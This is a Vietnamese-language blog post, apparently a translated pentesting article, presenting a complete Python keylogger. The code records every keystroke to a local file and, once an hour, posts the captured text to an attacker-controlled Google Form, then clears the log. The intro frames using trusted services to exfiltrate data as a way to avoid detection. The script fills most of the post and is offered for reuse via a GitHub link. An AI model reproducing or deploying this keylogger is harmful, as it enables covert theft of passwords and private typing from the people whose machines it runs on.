Thử nghiệm thâm nhập Python: Thoát khỏi hộp!
R. Eric Kiser
Để thực hiện kiểm tra thâm nhập thành công trên một tổ chức, bạn nên sử dụng phần mềm được ủy quyền và quyền truy cập hợp pháp để truyền dữ liệu. Bằng cách đó, nguy cơ bị phát hiện có thể giảm đáng kể. Trong bài viết này, tôi sẽ phác thảo các phương pháp mà tôi đã quan sát thấy kẻ tấn công sử dụng trong một lần tương tác và những sửa đổi tôi đã thực hiện để cải thiện kỹ thuật đó cho các lần tương tác tiếp theo. Xin lưu ý rằng tập lệnh có thể cần được tùy chỉnh để phù hợp với môi trường cụ thể mà tập lệnh đang được sử dụng.
Kẻ tấn công, kẻ đầu tiên sử dụng phương pháp này, đã lợi dụng một biểu mẫu công khai bị bỏ rơi và đăng kết quả keylogger trực tuyến để truy cập bên ngoài. Sự cố này nhấn mạnh tầm quan trọng của việc xóa thông tin đã hết hạn để tránh vi phạm dữ liệu hoặc trong trường hợp này, ngay cả khi vô tình vi phạm dữ liệu nhà ở. Nhiều tổ chức bỏ qua khía cạnh quan trọng này, tiếp tục hoạt động của họ mà không nhận ra sự cần thiết phải bảo trì dữ liệu thường xuyên. Đây là một ví dụ điển hình về lý do tại sao việc tạo vòng đời dữ liệu lại quan trọng, nhưng tôi lạc đề rồi.
Bây giờ chuyển sang viết kịch bản. Như mọi khi, bước đầu tiên là nhập các mô-đun của chúng tôi. Đối với tập lệnh này, chúng tôi cần sáu mô-đun; quy trình con, sys, os, thời gian, yêu cầu và bàn phím.
import subprocess
import sys
import os
import time
import requests
import keyboard
def install_dependency(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
try:
import keyboard
except ImportError:
install_dependency("keyboard")
import keyboard
try:
import requests
except ImportError:
install_dependency("requests")
import requests
path = 'keyboard_Input.txt'
keyboard_Input = []
count = 0
# Update these with your Google Form's action URL and entry IDs
form_url = "https://docs.google.com/forms/your_form_id/formResponse"
entry_id = "entry.your_entry_id"
def on_press(e):
global keyboard_Input, count
keyboard_Input.append(e.name)
count += 1
if count > 0:
count = 0
write_to_file(keyboard_Input)
keyboard_Input = []
def write_to_file(keys):
with open(path, 'a') as file:
for key in keyboard_Input:
write_down = str(key).replace("'", "")
if write_down.find('backspace') > 0:
file.write(' *BACKSPACE* ')
elif write_down.find('shift') > 0:
file.write(' *SHIFT* ')
elif write_down.find('enter') > 0:
file.write('\n')
elif write_down.find('space') > 0:
file.write(' ')
elif write_down.find('Key'):
file.write(write_down)
def send_data_to_google_form():
with open(path, 'r') as file:
data = file.read()
if data:
payload = {entry_id: data}
response = requests.post(form_url, data=payload)
if response.status_code == 200:
print("Data sent successfully")
with open(path, 'w') as file:
file.truncate()
else:
print("Failed to send data")
keyboard.on_press(on_press)
while True:
time.sleep(3600) # Wait for 1 hour (3600 seconds)
send_data_to_google_form()
Kho lưu trữ GitHub-Pentesting Python:
https://github.com/R-Eric-Kiser/python-pentesting/blob/main/keyloggerGoogleForm.py

![Dù sao thì một danh sách được liên kết là gì? [Phần 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































